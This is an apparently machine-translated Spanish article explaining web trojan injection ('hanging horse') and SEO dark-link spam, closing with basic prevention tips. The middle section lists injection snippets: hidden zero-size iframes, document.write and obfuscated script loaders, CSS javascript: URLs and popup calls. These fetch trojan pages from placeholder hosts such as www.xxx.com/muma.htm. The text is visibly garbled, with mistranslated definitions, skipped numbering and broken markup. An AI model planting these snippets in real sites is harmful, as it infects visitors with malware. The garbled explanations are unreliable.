Página web colgando caballo y detección de cadena oscura

¿Qué es una página web? Una página web es un atacante malicioso que, después de atacar un sitio web WEB, incrusta un fragmento de código o secuencia de comandos en una página web para descargar automáticamente un troyano con un propósito específico, mientras que un atacante malicioso implementa códigos o secuencias de comandos maliciosos. El comportamiento de la implantación a menudo se conoce como "caballo que cuelga".

¿Qué es la Cadena Oscura de SEO? La Cadena Oscura de SEO es un medio bastante común de las tácticas de sombrero negro de SEO. En términos generales, significa que algunas personas utilizan los medios anormales para obtener los derechos de otros sitios web, modificar el código fuente de sus sitios web y agregar el código de vínculo de retroceso que apunta a sus propios sitios web. El objetivo es optimizar la clasificación de algunas de las palabras clave en su sitio en los motores de búsqueda, o aumentar el peso del motor de búsqueda de su sitio. Ejemplo de cadena oscura:

Recientemente, muchas páginas de inicio que utilizan el programa de código abierto ECSHOP (varias versiones) han sido manipuladas e insertadas en el código malicioso de la cadena oscura de seo. La mayoría de los usuarios que utilizan ecshop desean optimizar la palabra clave "ugg ", compruébelo usted mismo. Método de verificación:

Abra la página de inicio del sitio web, haga clic con el botón derecho en el código fuente del sitio web y busque "ugg ".

página Web vinculada al daño del caballo por el mismo sitio, las páginas de los problemas asociados a caballo hay tres: 1, convirtiéndose en el troyano y " ", aliados títeres afectan a la reputación del sitio y la imagen pública 2, pérdida económica; 3, la pérdida de recursos del sistema es enorme; para el cliente, información confidencial robada, como cuentas bancarias, cuentas de juegos usadas para entretenimiento y otras cuentas sociales, que afectan seriamente el trabajo y la vida de los usuarios del cliente plantado; Además, puede usarse como fuente de ataque contra otras víctimas, lo que le da al atacante real un bote negro.

El principio del caballo de la página web El principio básico del caballo de la página web es explotar las vulnerabilidades del sistema operativo y las vulnerabilidades del navegador (todos los tipos de navegadores con IE son los más propensos a ser atacados, lo que está determinado por la cuota de mercado) Las vulnerabilidades en los complementos relacionados con el navegador (como Flash, Adobe Acrobat, etc., son muy comunes). Estas vulnerabilidades a menudo pueden causar desbordamientos de búfer y escalada de privilegios, y las vulnerabilidades pueden explotarse para ejecutar código arbitrario establecido por el atacante.

Caballo colgante tipo Frame, caballo colgante, archivo js, ​​cifrado de deformación js, caballo colgante, caballo colgante oculto, caballo colgante css, caballo colgante JAVA, camuflaje de imagen, llamada de camuflaje, engaño avanzado, etc. .

Ejemplo de caballo colgante: 1, cuadro colgante caballo < iframe src = dirección ancho = 0 altura = 0 > < /iframe >

2, js file hanging horse En primer lugar, el siguiente documento de código .write (" < iframe width = '0' height = '0' src = 'Address' > < /iframe > ");

Guardar como xxx.js, luego JS se cuelga El código es

< script language = javascript src = xxx.js > < /script >

3, js morph encryption < SCRIPT language = " JScript.Encode " src = http : //: //。。。。 Caballo colgante top.document.body.innerHTML = top.document.body.innerHTML '\\ r \\ n < iframe src = " http: //www.xxx.com/muma.htm/" > < /iframe > ';

6. Colgando caballos en css body {background-image: url (' javascript: document.write (" < script src = http: //www.XXX.net/muma.js> < /script > ") ')}

7, javascript hanging horse

< SCRIPT language = javascript > window.open (" dirección ", " " , " toolb Ar = no, ubicación = no, directorios = no, estado = no, barra de menú = no, scro llbars = no, ancho = 1, altura = 1 "); < /script >

8, camuflaje de imagen

< html > < iframe src = " Web Horse Address " altura = 0 ancho = 0 > < /iframe > < img src = " Dirección de imagen " > < /Centro > < /html >

9, camuflar llamada < frameset rows = " 444,0 " cols = " * " < < frame src = " abrir página " framborder = " no " scrolling = " auto " noresize marginwidth = " 0 " margingheight = " 0 " < frame src = " net address " frameborder = " no " scrolling = " no " noresize Marginwidth = " 0 " margingheight = " 0 " > < /frameset >

10, decepción avanzada < a href = " http: //www.xxx.com (dirección de conexión confusa, Mostrar esta dirección a la dirección del troyano) " > El contenido que se mostrará en la página < /a > < SCRIPT Language = " JavaScript " > función www_163_com () {var url = " dirección de red "; open ( Url " NewWindow ", " barra de herramientas = no, ubicación = no, directorios = no, estado = no, barra de menú = no, barras de desplazamiento = no, tamaño variable = no, copyhistory = sí, ancho = 800, altura = 600, izquierda = 10 , arriba = 10 ");}

Cómo evitar que las páginas web se cuelguen de los caballos Se recomienda la prevención de páginas web para desarrollar los siguientes buenos hábitos: 1. Es mejor no navegar por los sitios web con poca credibilidad; 2. Descargar recursos en línea Es mejor descargarlo en un sitio web de recursos más confiable; 3. Actualizar la base de datos de virus del software antivirus con frecuencia; 4. Aplicar parches al sistema y al software de la aplicación.